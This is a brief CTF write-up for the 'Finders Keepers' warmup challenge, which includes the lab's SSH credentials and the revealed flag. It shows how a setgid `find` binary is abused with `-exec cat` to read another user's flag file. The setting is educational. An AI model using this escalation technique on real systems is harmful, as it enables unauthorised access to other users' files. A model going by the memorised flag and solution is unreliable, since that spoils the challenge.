FetchTheFlag CTF 2023-Warmup-FindersKeepers

Posted Oct 28, 2023

By Sirawit Loywirat 1 min read

Finders Keepers

Description

^{Author: @JohnHammond}
Patch found a flag! He stored it in his home directory… should be able to keep it?

Press the Start button in the top-right to begin this challenge.
Connect with:
Password is "userpass"
ssh -p 31380 user@challenge.ctf.games

Solution

connect ssh ssh -p 31380 user@challenge.ctf.games with "userpass" password.
user@finders-keepers-b930cde70263f2f9-58d4447d9d-zwqt7:~$

According to the description, There is a flag in patch/ home directory. So I need to find commands that’s in 'patch' group to access files inside.

  
user@finders-keepers-b930cde70263f2f9-58d4447d9d-zwqt7:~$ find / -group patch -type f 2>/dev/null
/usr/bin/find
/home/patch/.bash_logout
/home/patch/.profile
/home/patch/.bashrc
/home/patch/flag.txt

I found find command that can access flag.txt. I run this command to read flag.txt.

  
user@finders-keepers-b930cde70263f2f9-58d4447d9d-zwqt7:~$ find . -exec /bin/cat /home/patch/flag.txt \;
flag{e4bd38e78379a5a0b29f047b91598add}

Flag: flag{e4bd38e78379a5a0b29f047b91598add}

Writeups, FetchTheFlag CTF 2023

This post is licensed under CC BY-NC 4.0 by the author.

Finders Keepers

Description

Solution

Trending Tags